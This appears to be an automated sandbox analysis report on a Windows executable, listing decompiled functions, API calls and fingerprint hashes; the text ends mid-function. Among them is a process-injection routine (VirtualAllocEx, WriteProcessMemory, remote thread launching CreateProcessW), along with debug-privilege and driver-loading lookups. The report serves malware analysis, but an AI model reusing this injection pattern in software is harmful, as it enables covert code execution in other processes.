                                                                                                                0x00402fb2
                                                                                                                0x00402fb2
                                                                                                                0x00402fbd
                                                                                                                0x00402fc5

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00402F51
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • wcsrchr.MSVCRT ref: 00402F6F
                                                                                                                • wcscat.MSVCRT ref: 00402F8A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                • String ID: .cfg
                                                                                                                • API String ID: 776488737-3410578098
                                                                                                                • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                                                                • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 35%
                                                                                                                			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20); // executed
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}










                                                                                                                0x00409ddc
                                                                                                                0x00409de4
                                                                                                                0x00409df0
                                                                                                                0x00409df5
                                                                                                                0x00409df6
                                                                                                                0x00409e03
                                                                                                                0x00409e05
                                                                                                                0x00409e06
                                                                                                                0x00409e3b
                                                                                                                0x00409e5d
                                                                                                                0x00409e6a
                                                                                                                0x00409e73
                                                                                                                0x00409e75
                                                                                                                0x00409e08
                                                                                                                0x00409e08
                                                                                                                0x00409e19
                                                                                                                0x00409e37
                                                                                                                0x00409e37
                                                                                                                0x00409e81

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00409E08
                                                                                                                  • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                                                  • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                                                • memset.MSVCRT ref: 00409E3B
                                                                                                                • GetPrivateProfileStringW.KERNEL32 ref: 00409E5D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1127616056-0
                                                                                                                • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                                                                • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                                                                0x00404951
                                                                                                                0x00404952
                                                                                                                0x00404956
                                                                                                                0x004049a1
                                                                                                                0x00404958
                                                                                                                0x00404959
                                                                                                                0x0040495b
                                                                                                                0x0040495b
                                                                                                                0x0040495f
                                                                                                                0x00404961
                                                                                                                0x00404963
                                                                                                                0x0040496d
                                                                                                                0x00404975
                                                                                                                0x00404977
                                                                                                                0x0040497b
                                                                                                                0x00404985
                                                                                                                0x0040498a
                                                                                                                0x0040498e
                                                                                                                0x00404993
                                                                                                                0x0040499d
                                                                                                                0x0040499d

                                                                                                                APIs
                                                                                                                • malloc.MSVCRT ref: 0040496D
                                                                                                                • memcpy.MSVCRT ref: 00404985
                                                                                                                • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: freemallocmemcpy
                                                                                                                • String ID: W@
                                                                                                                • API String ID: 3056473165-1729568415
                                                                                                                • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                                                • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}








                                                                                                                0x0040543f
                                                                                                                0x00405456
                                                                                                                0x00405462
                                                                                                                0x00405467
                                                                                                                0x0040546d
                                                                                                                0x00405478
                                                                                                                0x00405489
                                                                                                                0x0040548d
                                                                                                                0x00000000
                                                                                                                0x00405492
                                                                                                                0x00405496

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                  • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                                                  • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                                                • wcscat.MSVCRT ref: 00405478
                                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3725422290-0
                                                                                                                • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                                                                • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409E82, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetPrivateProfileIntW.KERNEL32 ref: 00409EA9
                                                                                                                  • Part of subcall function 00409D12: memset.MSVCRT ref: 00409D31
                                                                                                                  • Part of subcall function 00409D12: _itow.MSVCRT ref: 00409D48
                                                                                                                  • Part of subcall function 00409D12: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00409D57
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4232544981-0
                                                                                                                • Opcode ID: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                                • Instruction ID: 9cbd54488ddde29c65bb9f464d3594e5c231a9cc3fc51dd6b87f783e4d357368
                                                                                                                • Opcode Fuzzy Hash: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                                • Instruction Fuzzy Hash: CDE0B632000209FFDF125F80EC01AAA3B66FF14315F648569F95814171D33799B0EF88
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}






                                                                                                                0x00408f4c
                                                                                                                0x00408f57
                                                                                                                0x00408f60
                                                                                                                0x00408f62
                                                                                                                0x00408f67
                                                                                                                0x00408f67
                                                                                                                0x00408f71

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                  • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 187924719-0
                                                                                                                • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                                                • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}







                                                                                                                0x004098fa
                                                                                                                0x004098fc
                                                                                                                0x00409901
                                                                                                                0x00409907
                                                                                                                0x00000000
                                                                                                                0x0040991c
                                                                                                                0x00409918
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$FileModuleName
                                                                                                                • String ID:
                                                                                                                • API String ID: 3859505661-0
                                                                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}






                                                                                                                0x004095da
                                                                                                                0x004095da
                                                                                                                0x004095de
                                                                                                                0x004095e1
                                                                                                                0x004095e7
                                                                                                                0x004095e7
                                                                                                                0x004095ee
                                                                                                                0x004095fc

                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                                                                • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}



                                                                                                                0x0040a3d0
                                                                                                                0x0040a3d9

                                                                                                                APIs
                                                                                                                • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: EnumNamesResource
                                                                                                                • String ID:
                                                                                                                • API String ID: 3334572018-0
                                                                                                                • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                                                                • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}






                                                                                                                0x00408e38
                                                                                                                0x00408e44
                                                                                                                0x00408e56
                                                                                                                0x00408e68
                                                                                                                0x00408e7a
                                                                                                                0x00408e8c
                                                                                                                0x00408e9e
                                                                                                                0x00408eb0
                                                                                                                0x00408ec2
                                                                                                                0x00408ed4
                                                                                                                0x00408ee6
                                                                                                                0x00408ef8
                                                                                                                0x00408f0a
                                                                                                                0x00408f1c
                                                                                                                0x00408f21
                                                                                                                0x00408f23
                                                                                                                0x00000000
                                                                                                                0x00408f28
                                                                                                                0x00408f29

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                                • API String ID: 667068680-4280973841
                                                                                                                • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                                                                • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208librarymemoryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 70%
                                                                                                                			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
